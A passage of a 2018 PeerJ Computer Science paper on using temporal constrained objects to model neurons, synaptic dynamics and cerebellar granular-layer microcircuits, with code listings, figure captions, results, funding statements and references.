a neuron was set as the sum of its synaptic currents using the constraint: N.Iin =Am.Iampa+Ga.Igaba+Nm.Inmda; This constraint automatically enforces the relation between change in membrane voltage of the neuron and the synaptic inputs it receives. A cluster of such neurons were simulated by creating an array of TCOB objects. Constraint solving and evaluation of these objects utilized the implicit parallelization of constraints from the constraint store (Hutchison & Mitchell, 1973). Modelling cerebellar microcircuits As a test of viability to use temporal constrained object based models for neural modelling, firing patterns of several types of known neurons of the cerebellum were reconstructed as in a previous study (Nair et al., 2014). Single neurons of Wistar rat cerebellum were modelled and attempted mathematical reconstruction of small scale cerebellar microcircuits. Associated with motor tasks and motor adaptation (Kandel et al., 2000), cerebellum receives inputs from major motor regions of the brain and gives feedback to these sources. The significantly large number of granule cells in the input layer of the cerebellum distinguishes cerebellum from the rest of the nervous system. The computational significance of these neurons has been a topic of interest and granule cell has received recent attention in computational modelling studies attributed to the numerosity, its electronically compact structure, simpler dendritic arbor and the signal recoding computations that it performs on Neuron <<attributes>> <<constraints>> <<constructor>> 0 ..* 0 ..* 0 ..* 0 ..* 0 ..* 0 ..* Adex_neuron <<attributes>> <<constraints>> <<constructor>> 11 Nmda <<attributes>> <<constraints>> <<constructor>> Gaba <<attributes>> <<constraints>> <<constructor>> Ampa <<attributes>> <<constraints>> <<constructor>> Figure 6 UML representation of TCOB implementation of a Neuron with synapses. A single neuron is represented as an aggregate of a neuron model and model synapses. Full-size DOI: 10.7717/peerj-cs.159/fig-6 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 17/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-6 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ the inputs that it receive from different brain regions (Diwakar et al., 2009; Solinas, Nieus & D’Angelo, 2010; D’Angelo, 2011). To reconstruct all the computational elements of the cerebellar circuitry and their convergence-divergence ratios, computationally effective methods may be needed to model circuit functions (Markram, 2006). The input to cerebellum is through mossy fibres innervating the granule and Golgi neurons (Fig. 8A). While Golgi neurons inhibit granule neurons via a feed-forward inhibition, the axons of granule cells extend as parallel fibres and excite Purkinje neurons. As in experiments (Diwakar et al., 2009), modelled granule neuron receives on an average four excitatory and four inhibitory connections. In this paper, a small scale granular layer circuitry with Purkinje neurons was modelled with temporal constrained objects (Fig. 8B) using classes granule, golgi, purkinje, mossyfiber and parallelfiber respectively. A model neuron inherited from the Neuron class and was represented using AdEx dynamics. Excitatory synapses were modelled using AMPA kinetics and inhibitory synapses were modelled using GABA kinetics. In the implementation, the microcircuit consisted of an aggregation of the neurons and synapses (Fig. 9). The temporal constrained object model of the microcircuit allowed computing the spike- train responses of constituent neurons. The class Microcircuit (Fig. 10) modelled the rat granular layer neural circuit (also see UML flow diagram in Fig. 9). In the model, granule and Golgi neurons received mossy fibre inputs and the change in membrane potential of Golgi and Purkinje neurons were automatically computed by satisfying internal and interface constraints. Initial inputs to granule and Golgi neurons were provided by mossy fibre. This was represented in the constraints: GoC.MfInput = Mf.Input; GrC.MfInput = Mf.Input; The variable SpikeTrain holds the response train of each neuron, generated as a result of model evaluation. class Neuron { attributes Adex_neuron N; Ampa Am; Gaba Ga;Nmda Nm; constraints Am.Vm = N.Vm; Ga.Vm = N.Vm; Nm.Vm = N.Vm; N.Iin =Am.Iampa+Ga.Igaba+Nm.Inmda; constructor Neuron(){ N=new Adex_neuron(200.0,10.0,-70.0,2.0,-50.0,2.0,0.0, 0.0,30.0,-58.0); Am = new Ampa(); Ga = new Gaba(); Nm = new Nmda(); } } Figure 7 TCOB representation of Neuron with Synapse. Full-size DOI: 10.7717/peerj-cs.159/fig-7 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 18/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-7 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ The Golgi neuron output is applied to granule neuron using the constraints GoC.Output = GoC.SpikeTrain; GrC.GoCInput = GoC.Output such that the granule neuron receives both excitatory input through mossy fibres and inhibitory input through Golgi neurons. Mossy Fiber inputs from various brain regions Golgi Cell Granule Cell Purkinje Cell Basket Cell Stellate Cell Climbing Fiber Input from IO Parallel Fiber Output to DCN A Mossy Fiber + + - - + Golgi Cell Granule Cell Purkinje Cell Parallel Fiber Input Output B Figure 8 Modelling sample cerebellar microcircuits. (A) Circuits in the cerebellum: cartoon repre- sentation of interconnections in the input-output pathway of the cerebellum. (B) Cellular components of the microcircuit reconstructed: Granule neuron, Golgi neuron and Purkinje neuron, receiving inputs through excitatory (+) and inhibitory (-) synapses. Full-size DOI: 10.7717/peerj-cs.159/fig-8 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 19/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-8 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ In the next level of processing, output from the granular layer is applied as the parallel fibre input into Purkinje neurons using the constraints: GrC.Output = GrC.SpikeTrain; Pf.Input = GrC.Output; Pc.GrCInput = Pf.Input; 0 ..* 0 ..* 0 ..* 0 ..* 0 ..* 0 ..* Neuron <<attributes>> <<constraints>> <<constructor>> Granule <<attributes>> <<constraints>> <<constructor>> Golgi <<attributes>> <<constraints>> <<constructor>> Purkinje <<attributes>> <<constraints>> <<constructor>> Mossyfiber <<attributes>> <<constraints>> <<constructor>> Parallelfiber <<attributes>> <<constraints>> <<constructor>> Microcircuit <<attributes>> <<constraints>> <<constructor>> Figure 9 UML representation of temporal constrained object implementation of the microcircuit. Granule, Golgi and Purkinje classes inherit from the class Neuron. The classes Mossy Fiber and Parallel Fiber represented inputs to the neurons. In the implementation, the microcircuit consisted of an aggregation of the neurons and synapses. Full-size DOI: 10.7717/peerj-cs.159/fig-9 class Microcircuit { attributes Mossyfiber Mf; Parallelfiber Pf; Granule GrC; Golgi GoC; Purkinje Pc; constraints GoC.MfInput = Mf.Input; GrC.MfInput = Mf.Input; GoC.Output = GoC.SpikeTrain; GrC.GoCInput = GoC.Output; GrC.Output = GrC.SpikeTrain; Pf.Input = GrC.Output; Pc.GrCInput = Pf.Input; Pc.Output = Pc.SpikeTrain; constructor microcircuit(){ ... } } Figure 10 Representation of cerebellar microcircuit. Full-size DOI: 10.7717/peerj-cs.159/fig-10 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 20/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-9 http://dx.doi.org/10.7717/peerj-cs.159/fig-10 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ After evaluating the constraints of Purkinje neuron, the entire output from the microcircuit was made available as: Pc.Output = Pc.SpikeTrain; The constraints highlighted above can be viewed as the interface constraints of the models while each object in the microcircuit class has its own internal constraint to be satisfied while object creation. The model evaluations were performed automatically while the constructor of the microcircuit class is called. The entire code with the programming environment is available freely at https://github. com/compneuro/TCOB_Neuron. RESULTS Temporal spike train firing patterns in neurons To demonstrate the effectiveness of constraint evaluation results against state-of-the-art simulations, the output of TCOB models were recorded using TCOB predicates. Using 0 10 20 30 40 50 60 -50 0 50 V ol ta ge (m V ) I V A -100 -50 0 DC Time(ms) 0 10 20 30 40 50 60 70 80 90 1000 10 20 30 40 50 60 70 80 90 100 Time(ms) Time(ms) V ol ta ge (m V ) -100 -50 0 V ol ta ge (m V ) 0 20 40 60 80 100 120 140 160 180 200 -100 0 100 V o lt a g e (m V ) 0 20 40 60 80 100 120 140 160 180 200 -100 0 100 V o lt a g e (m V ) FE Time(ms) Time(ms) 0 10 20 30 40 50 60 70 80 90 100 0 0.5 1 I = 3 pA Time(ms) M N H B Figure 11 Modelling the spiking mechanisms of neurons. Simulation times are in millisecond scale matching slice recordings (Hodgkin & Huxley, 1952). The initial resting membrane potential was kept at -70 mV. (A) Firing of HH neuron for current stimuli of various amplitudes. The implementation showed repetitive firing behaviour for input current of six pA onwards. Firing rate of the neuron depended on the intensity of the injected current. Firing rate increased as the depolarizing current increases. (B) Channel Gating parameters m, n, h of the model for input current of three pA. m changed faster than h or n. During hyperpolarization m, h and n returned towards resting values. (C) Regular spiking behaviour shown by most typical neurons in the cortex reproduced using Izhikevich model. (D) Chattering: Stereotypical bursts of closely spaced spikes reproduced using Izhikevich model. (E) Tonic spiking with sharp reset showed the behaviour of certain constantly active neurons, modelled using AdEx equations. (F) Adaptation behaviour of certain neurons showing the reduction in firing frequency, modelled using AdEx equations. Full-size DOI: 10.7717/peerj-cs.159/fig-11 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 21/31 https://github.com/compneuro/TCOB_Neuron https://github.com/compneuro/TCOB_Neuron http://dx.doi.org/10.7717/peerj-cs.159/fig-11 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ standard values for model parameters, voltage plots of continuous-time HH models and voltage-reset models, Izhikevich and AdEx, were reproduced (Naud et al., 2008). In HH models, computationally reconstructed action potential peaked at a voltage of +40 mV, followed by hyper-polarization following which the resting potential was re-established (Hodgkin & Huxley, 1952) (Fig. 11A). As in experiments, when the injected current in the model was insufficient to depolarize the membrane, no action potential was generated. In our implementation, a minimum threshold non-zero current was observed for which the HH model demonstrated repeated firing, and the firing frequency increased with the increase in intensity of the input. The plot of HH gating variables depicted the behaviour of channel activation and inactivation (Fig. 11B). Izhikevich and AdEx models were also stimulated with input currents to reproduce various firing behaviour of different neuron types in the brain (Figs. 11C–11F). The neuron and synapse models implemented using temporal constrained objects were parameter optimized to reproduce the firing behaviour of different neuron types present in the cerebellum (Medini et al., 2014; Nair et al., 2014) under current clamp experiments (D’Angelo et al., 1995; Bezzi et al., 2004), during in vitro behaviour (as seen in brain slices) and during in vivo behaviour (as seen in anaesthetized rats) for inputs through mossy fibres (Diwakar et al., 2009). Single spike inputs were applied through the synapses to model in vitro inputs while small burst inputs (e.g., five spikes per burst) was used to model in vivo inputs (Roggeri et al., 2008). The modelled responses of granule, Golgi and Purkinje neurons using AdEx neuron models for 10 pA input current are shown in Figs. 12A–12C (Medini et al., 2014). The modelled responses of granule neurons during in vitro inputs and in vivo inputs are shown in Figs. 12D and 12E. CB -80 -70 -60 -50 -40 -30 -20 -10 0 Granule Vo lta ge (m V) 0 50 100 150 200 -70 -60 -50 -40 -30 -20 -10 0 Golgi Vo lta ge (m V) 0 50 100 150 200 -70 -60 -50 -40 -30 -20 -10 0 Purkinje Vo lta ge (m V) A 0 50 100 150 200 0 50 100 -100 -50 0 50 Membrane Voltage V ol ta ge ( m V ) Time (ms) D 0 50 100 -100 -50 0 50 Membrane Voltage Time (ms) V ol ta ge ( m V ) E Figure 12 Modelling cerebellar neurons. (A–C) Granule, Golgi and Purkinje neuron responses for current clamp protocol (I = 10 pA), modelled using AdEx equations. (D and E) Response of granule neurons for in vitro like (left) and in vivo like (right) spike inputs. Full-size DOI: 10.7717/peerj-cs.159/fig-12 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 22/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-12 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Synaptic dynamics resolved using TCOB Using a conductance-based synaptic mechanism, neurons were excited synaptically using pre-synaptic spike trains. Alpha function reproduced the post-synaptic conductance of synapses with a finite rise time (Fig. 13A). Instantaneous rise and exponential decay of membrane potential were modelled using single exponential synapses (Fig. 13B). A closer approximation of post-synaptic dynamics was obtained by employing double exponential models. Fluctuations of synaptic conductance were approximated using rise time and decay time of conductance change independently (Fig. 13C). The activation kinetics of excitatory and inhibitory synaptic receptors was modelled using AMPA, NMDA, GABAA and GABAB receptor behaviour (Fig. 13D). In the models, AMPA channels mediated the fast-excitatory transmission and were characterized by fast rise time and decay time for the conductance values. Significantly slower NMDA channel modelled related to modifications of synaptic efficacy and temporal summation of currents. In the implementations, the two primary inhibitory receptor kinetics; GABAA and GABAB modelled the fast and slow time course of inhibitory interactions. Correctness of computations and performance improvements in TCOB models To test numerical accuracy of TCOB for floating point computations, the results of numerical integration of TCOB were compared with imperative C++ implementation. Fourth-order Runge–Kutta integration technique was employed for solving differential equations in the imperative implementation while numerical approximation using 0 10 20 30 40 50 60 70 80 90 100 0 0.2 0.4 0.6 0.8 1 1.2 1.4 Time (ms) C on du ct an ce ( G sy n) Tau=3 ms Tau= 12ms 0 10 20 30 40 50 60 70 80 90 100 0 0.5 1 1.5 2 2.5 3 Time (ms) C on du ct an ce ( G sy n) Tau=3 ms Tau= 12ms 0 10 20 30 40 50 60 70 80 90 100 -300 -250 -200 -150 -100 -50 0 50 100 Time (ms) C on du ct an ce ( G sy n) Taurise=12 ms ,Taudecay=3 ms Taurise=3 ms ,Taudecay=12ms 0 50 100 150 200 250 300 -15 -10 -5 0 5 10 15 20 Time (ms) C on du ct an ce ( G sy n) AMPANMDA GABAa GABAb BA C D Figure 13 Reconstructing Synaptic Dynamics using temporal constrained objects. (A) The conductance changes in alpha function for � = 3 ms and � = 12 ms. (B) Synaptic conductance modelled using single exponential function for � = 3 ms and � = 12 ms. (C) Synaptic conductance modelled using double exponential function. (D) Modelled conductance changes for AMPA, NMDA, GABAA and GABAB synapses for input spike at time t = 20 ms. Full-size DOI: 10.7717/peerj-cs.159/fig-13 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 23/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-13 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Euler approach was used for the current TCOB models. It has been observed that the membrane voltage traces produced by both approaches were approximately similar for the entire time evolution (Figs. 14A–14C). In this paper, we present the core concepts of TCOB and we have not discussed library support for the language. It is straightforward to make standard solvers for differential equations, such as Runge–Kutta, as library functions so that the programmer does not have to define them. However, these solvers need to be ‘programmed’ by the end user, the specification occurs at a much higher level than would be the case in an imperative language such as C or C++. Although LOC are not always a definitive measure of software complexity, the declarative approach of a temporal constrained object model significantly reduced coding time, making the model more compact and closer to the problem specification, and hence also easier to understand, similar to scripting languages used in computational modelling. In comparison with the C++ version of the HH model, which required about 300 LOC, the temporal constrained object version was implemented in just 30 LOC. TCOB compiler translates the temporal constrained objects program into Prolog code which can be executed directly under SWI-Prolog with a CLP(R) library. The potential sources of performance inefficiency of TCOB are due to the layers of predicate calls arising from the systematic translation and also due to the repeated checking of consistency in the underlying constraint store. To alleviate these inefficiencies, we adapted 0 10 20 30 40 50 60 70 80 90 100 -100 -50 0 50 Voltage Plots Time (ms) V o lta g e (m V ) C++ TCOB 23.5 24 24.5 25 25.5 26 26.5 27 -100 -50 0 50 Time (ms) V o lt a g e (m V ) C++ TCOB A 100 200 300 400 500 600 700 800 900 1000 0 0.2 0.4 0.6 0.8 1 1.2 1.4 Time Step E xe cu tio n T im e ( s) Translated Code Partially Evaluated Code B D Partial Evaluation 0 50 100 150 200 -100 -50 0 50 TCOB 0 50 100 150 200 -100 -50 0 50 C++ V o lta g e (m V ) V o lta g e (m V ) Time (ms) Time (ms) C Figure 14 Correctness of computations and performance improvement. (A) HH model voltage traces simulated using C++ and TCOB for 6 pA input current. Inset shows the area of voltage plot in which absolute error was high. (B) Firing patterns for spike train adaptation of neurons modelled with AdEx model and implemented in TCOB. (C) Firing patterns for spike train adaptation of neurons modelled with AdEx model and implemented in C++. (D) Time step vs. execution time plot for HH model to show the improvement in performance time for partially evaluated code. Full-size DOI: 10.7717/peerj-cs.159/fig-14 Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 24/31 http://dx.doi.org/10.7717/peerj-cs.159/fig-14 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ and extended a partial evaluation technique (Kannimoola, Jayaraman & Achuthan, 2016) for optimized code generation of constrained object programs that was first presented in Tambay (2003). Given the translated Prolog program of TCOB and a top-level goal, the partial evaluator outputs the list of constraints that need to be solved for the given goal. The partial evaluation process makes our implementation independent from constraint solver. On an Intel i7 processor-based desktop computer with 16 GB memory, the partially evaluated code for HH model executed approximately six times faster than the corresponding normal code (Fig. 14D). DISCUSSION Temporal constrained objects were able to successfully recreate substantive classes of neuroscience models related to time-varying behaviour using a declarative approach. With large-scale brain circuit models in mind, the compositional modelling requirement was tested by mathematically reconstructing the constituent components of neuronal network, i.e., neurons and synapses. Models that followed continuous-time functions, such as the HH type neuron model, as well as different synaptic models were implemented in temporal constrained objects easily. Special mention must be made of how temporal constrained objects were able to express voltage-reset models which exhibit piecewise continuous-time behaviour through a constant reset of the voltage. These models exhibit both discrete and continuous state changes, in contrast to the continuous-time behaviour of HH type neuron models. Such systems that exhibited discontinuous behaviour or choice, such as the Izhikevich- and AdEx-type neuron models, required injecting a discontinuous change during constraint-solving. Temporal constrained objects were able to elegantly support this capability using series variables and conditional constraints, i.e., whenever the condition was met for resetting the voltage, the value of the series variable at the applicable point in time is set appropriately. It should be noted that this is not an imperative update of a state variable but rather the declarative specification of a value at a new point in time of the series variable. Both continuous and voltage reset behaviour of the models implemented in temporal constrained objects, generated typical firing patterns of different neurons. Even though we have used manually defined synaptic connections in the example scripts, conditional constraints and dynamic typing in TCOB enables to use dynamic construction of objects based on the various conditions of the networks. Since temporal constrained objects also supports unbounded arrays, neurons can be programmed to receive dynamic stimuli generated from constraints. Since TCOB programming environment use SWI-Prolog built-in predicates to create random numbers, synaptic jitter and other forms of randomness in the network can also be modelled easily. Having been able to test that the tractability of employing temporal constrained objects as arbitrary neuron models, we perceive that temporal constrained object implementations allow continuous functions as in HH models or discrete state change of functions as in voltage reset models. Constraint-based systems accumulate and aggregate the partial information from the set of constraints. Moreover, the order of constraint specification does not depend on the final result, which permits the incremental addition of information to the constraint Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 25/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ store at any point of execution without worrying about the computation state. Temporal constrained object-like frameworks are well-suited for modelling systems from which useful inferences are to be derived based on partial or incomplete information available at the current stage. In computational neuroscience of neurons and circuits, this feature enables the modeller to process information incrementally at each functional zone with in specialized brain circuits. CONCLUSION In our temporal constrained object implementation, the modelled neural responses reproduced biologically validated and relevant outputs as observed in experiments. The identification of global constraints of the system are to be tested on a larger scale, i.e. at the population level. Debugging network models in such frameworks has been changed to a constraint satisfaction problem where the constraint-solving algorithms operate on the constraint representation of the network variables, their domain and a set of relations between these variables. Successively imposing constraints with the level of details expected makes the system automatically scalable in terms of its software representation. Although the current implementation of temporal constrained objects is not most efficient to compare with specialised simulators available for computational neuroscience, it is hoped that with novel re-implementation of the temporal constrained objects programming platform, we would be able to express models for large-scale reconstructions in the future. With new computing architecture and multiple core GPUs and CPUs, it is crucial to consider declarative modelling strategies that allow implicit parallelization. This re-implementation, however, pilots a general-purpose constrained object-based programming paradigm to declaratively express both the concept space and computational space of neuron models where the model evaluations are automatically handled by the computational engine. While declarative languages provide a much higher level of abstraction and are more scalable, the execution of declarative programs under early implementations faced performance bottlenecks. Since slight changes in the constraint formulation may lead to unpredictable changes in the performance of the system, stability of constraint formulation of a model has always been challenged. Similar limitations exist while applying cost optimization techniques (Barták, 1999). Over the years, with advances in compiler and hardware technologies, the performance of declarative programs improved significantly, but is still not equal to that of imperative programs such as C or C++. Detailed performance measures were introduced to reduce the execution time by using methodologies such as compile-time optimization and partial evaluation. With these improvements, we feel that our proposed paradigm of temporal constrained objects is a good candidate for modelling small- to medium-scale brain circuit structures. In order to build constrained-object-based simulators for large-scale networks, we propose studying the parallelization of temporal constrained objects. Temporal constrained objects with parallelization are a promising approach for representing the emergent properties of systems that otherwise is too complex to model at multiple translational levels. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 26/31 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ ACKNOWLEDGEMENTS This work derives direction and ideas from the Chancellor of Amrita University, Sri Mata Amritanandamayi Devi. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was partially supported by Grants SR/CSRI/60/2013 from Department of Science and Technology, Young Faculty Research Fellowship—Sir Visvesvaraya PhD Scheme, MeitY, Government of India and by Embracing The World. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Department of Science and Technology: SR/CSRI/60/2013, Young Faculty Research Fellowship. Competing Interests The authors declare that they have no competing interests. Author Contributions � Manjusha Nair conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Jinesh Manchan Kannimoola conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Bharat Jayaraman conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Bipin Nair analysed the data, authored or reviewed drafts of the paper, approved the final draft. � Shyam Diwakar conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: GitHub: https://github.com/compneuro/TCOB_Neuron. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 27/31 https://github.com/compneuro/TCOB_Neuron http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.159#supplemental-information. REFERENCES Barták R. 1999. Constraint programming: in pursuit of the holy grail. Proceedings of the Week of Doctoral Students. Prague: Univerzita Karlova, 555–564. Benhamou F, Jussien N, O’Sullivan BA. 2007. Trends in Constraint Programming. London: Wiley-ISTE. Bezzi M, Nieus T, Coenen OJMD, D’Angelo E. 2004. An integrate-and-fire model of a cerebellar granule cell. Neurocomputing 58–60:593–598 DOI 10.1016/j.neucom.2004.01.100. Borning A. 1981. The Programming Language Aspects of ThingLab, a constraint-oriented simulation laboratory. ACM Transactions on Programming Languages and Systems 3(4):353–387 DOI 10.1145/357146.357147. Brette R, Gerstner W. 2005. Adaptive exponential integrate-and-fire model as an effective description of neuronal activity. Journal of Neurophysiology 94(5):3637–3642 DOI 10.1152/jn.00686.2005. Campeotto F, Dal Palù A, Dovier A, Fioretto F, Pontelli E. 2014. Exploring the use of GPUs in constraint solving. Lecture Notes in Computer Science 8324:152–167 DOI 10.1007/978-3-319-04132-2_11. Cannon RC, Gleeson P, Crook S, Ganapathy G, Marin B, Piasini E, Silver RA. 2014. LEMS: a language for expressing complex biological models in concise and hierarchical form and its use in underpinning NeuroML 2. Frontiers in Neuroinformatics 8:79 DOI 10.3389/fninf.2014.00079. Covert MW, Famili I, Palsson BO. 2003. Identifying constraints that govern cell behavior: a key to converting conceptual to computational models in biology? Biotechnology and Bioengineering 84(7):763–772 DOI 10.1002/bit.10849. D’Angelo E. 2011. Neural circuits of the cerebellum: hypothesis for function. Journal of Integrative Neuroscience 10(3):317–352 DOI 10.1142/S0219635211002762. D’Angelo E, De Filippi G, Rossi P, Taglietti V. 1995. Synaptic excitation of individual rat cerebellar granule cells in situ: evidence for the role of NMDA receptors. Journal of Physiology 484(2):397–413 DOI 10.1113/jphysiol.1995.sp020673. Darlington J, Reeve M, Wright S. 1990. Declarative languages and program transformation for programming parallel systems: a case study. Concurrency: Computation Practice and Experience 2(3):149–169 DOI 10.1002/cpe.4330020302. Davison AP, Brüderle D, Eppler J, Kremkow J, Muller E, Pecevski D, Perrinet L, Yger P. 2009. PyNN: a common interface for neuronal network simulators. Frontiers in Neuroinformatics 2:11 DOI 10.3389/neuro.11.011.2008. Destexhe A, Mainen ZF, Sejnowski TJ. 1998. Kinetic Models of Synaptic Transmission. Cambridge: MIT Press. Diesmann M, Gewaltig M-O. 2001. NEST: an environment for neural systems simulations. In: Plesser T, Macho V, eds. Forschung und wisschenschaftliches Rechnen. Göttingen: Beitrage zum Heinz-Billing-Preis, 43–70. Diwakar S, Magistretti J, Goldfarb M, Naldi G, D’Angelo E. 2009. Axonal Na + channels ensure fast spike activation and back-propagation in cerebellar granule cells. Journal of Neurophysiology 101(2):519–532 DOI 10.1152/jn.90382.2008. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 28/31 http://dx.doi.org/10.7717/peerj-cs.159#supplemental-information http://dx.doi.org/10.7717/peerj-cs.159#supplemental-information http://dx.doi.org/10.1016/j.neucom.2004.01.100 http://dx.doi.org/10.1145/357146.357147 http://dx.doi.org/10.1152/jn.00686.2005 http://dx.doi.org/10.1007/978-3-319-04132-2_11 http://dx.doi.org/10.3389/fninf.2014.00079 http://dx.doi.org/10.1002/bit.10849 http://dx.doi.org/10.1142/S0219635211002762 http://dx.doi.org/10.1113/jphysiol.1995.sp020673 http://dx.doi.org/10.1002/cpe.4330020302 http://dx.doi.org/10.3389/neuro.11.011.2008 http://dx.doi.org/10.1152/jn.90382.2008 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Felgentreff T, Millstein T, Borning A, Hirschfeld R. 2015. Checks and balances: constraint solving without surprises in object-constraint programming languages. OOPSLA 2015: Proceedings of the 2015 ACM SIGPLAN International Conference on Object-Oriented Programming, Systems, Languages, and Applications 50(10):767–782 DOI 10.1145/2814270.2814311. Freeman-Benson BN, Maloney J, Borning A. 1990. An incremental constraint solver. Communications of the ACM 33(1):54–63 DOI 10.1145/76372.77531. Fritzson P. 2004. Principles of Object-Oriented Modeling and Simulation with Modelica 2.1. Hoboken: Wiley-IEEE Press. Gleeson P, Crook S, Cannon RC, Hines ML, Billings GO, Farinella M, Morse TM, Davison AP, Ray S, Bhalla US, Barnes SR, Dimitrova YD, Silver RA. 2010. NeuroML: a language for describing data driven models of neurons and networks with a high degree of biological detail. PLOS Computational Biology 6(6):e1000815 DOI 10.1371/journal.pcbi.1000815. Goddard NH, Hood G. 1998. Large scale simulation using parallel GENESIS. In: The Book of Genesis. New York: Springer, 349–380. Goodman D, Brette R. 2008. Brian: a simulator for spiking neural networks in python. Frontiers in Neuroinformatics 2:5 DOI 10.3389/neuro.11.005.2008. Govindarajan K, Jayaraman B, Mantha S. 1996. Optimization and relaxation in constraint logic languages. Symposium on Principles of Programming Languages. New York: ACM, 91–103. Gupta V, Jagadeesan R, Saraswat V, Bobrow DG. 1995. Programming in hybrid constraint languages. In: Proceedings of the 3rd Workshop on Hybrid Systems, October 28–30 1994. Berlin: Springer, 226. Gutkin B, Pinto D, Ermentrout B. 2003. Mathematical neuroscience: from neurons to circuits to systems. Journal of Physiology 97(2–3):209–219 DOI 10.1016/j.jphysparis.2003.09.005. Hines ML, Carnevale NT. 1997. The NEURON simulation environment. Neural Computation 9(6):1179–1209 DOI 10.1162/neco.1997.9.6.1179. Hodgkin AL, Huxley AF. 1952. Currents carried by sodium and potassium ions through the membrane of the giant axon of Loligo. Journal of Physiology 116(4):449–472 DOI 10.1113/jphysiol.1952.sp004717. Hon A, Chun W. 1999. Constraint programming in Java with JSolver. In: Proceedings of PACLP99, The Practical Application of Constraint Technologies and Logic Programming, London. Horn B. 1991. Siri: A Constrained-Object Language for Reactive Program Implementation. Pittsburgh, PA: School of Computer Science at Research Showcase at CMU. Horn B. 1993. Constrained objects. PhD thesis, Carnegie Mellon University. Hucka M, Finney A, Sauro HM, Bolouri H, Doyle JC, Kitano H, Arkin AP, Bornstein BJ, Bray D, Cornish-Bowden A, Cuellar AA, Dronov S, Gilles ED, Ginkel M, Gor V, Goryanin II, Hedley WJ, Hodgman TC, Hofmeyr JH, Hunter PJ, Juty NS, Kasberger JL, Kremling A, Kummer U, Le Novère N, Loew LM, Lucio D, Mendes P, Minch E, Mjolsness ED, Nakayama Y, Nelson MR, Nielsen PF, Sakurada T, Schaff JC, Shapiro BE, Shimizu TS, Spence HD, Stelling J, Takahashi K, Tomita M, Wagner J, Wang J. 2003. The systems biology markup language (SBML): a medium for representation and exchange of biochemical network models. Bioinformatics 19(4):524–531 DOI 10.1093/bioinformatics/btg015. Hutchison D, Mitchell JC. 1973. Principles and Practice of Constraint Programming—CP 2009. Berlin, Heidelberg: Springer. Izhikevich EM. 2003. Simple model of spiking neurons. IEEE Transactions on Neural Networks 14(6):1569–1572 DOI 10.1109/tnn.2003.820440. Nair et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.159 29/31 http://dx.doi.org/10.1145/2814270.2814311 http://dx.doi.org/10.1145/76372.77531 http://dx.doi.org/10.1371/journal.pcbi.1000815 http://dx.doi.org/10.3389/neuro.11.005.2008 http://dx.doi.org/10.1016/j.jphysparis.2003.09.005 http://dx.doi.org/10.1162/neco.1997.9.6.1179 http://dx.doi.org/10.1113/jphysiol.1952.sp004717 http://dx.doi.org/10.1093/bioinformatics/btg015 http://dx.doi.org/10.1109/tnn.2003.820440 http://dx.doi.org/10.7717/peerj-cs.159 https://peerj.com/computer-science/ Jayaraman B, Tambay P. 2002. Modeling engineering structures with constrained objects. Lecture Notes in Computer Science: Practical Aspects of Declarative Languages 2257:28–46 DOI 10.1007/3-540-45587-6_4. Kandel ER, Schwartz JH, Jessell TM, Mack S, Dodd J, Butler J, Lebowitz H, Dahlgren S, Supervisor P, Siegel E, Manager A, Ackerman J, Cuddihy J, Graphics P, Donnelley RR. 2000. Principles of Neural Science. McGraw-Hill: McGraw-Hill. Kannimoola JM, Jayaraman B, Achuthan K. 2016. Dynamic constrained objects for vehicular system modeling. In: Workshop on Applied Formal Methods for Safety-critical Systems. Singapore: Springer. Kannimoola JM, Jayaraman B, Achuthan K. 2018. Declarative modeling and verification of firewall rules with temporal constrained objects. In: 2nd Symposium on Application of Formal Methods for Safety & Security of Critical Systems. Singapore: Springer. 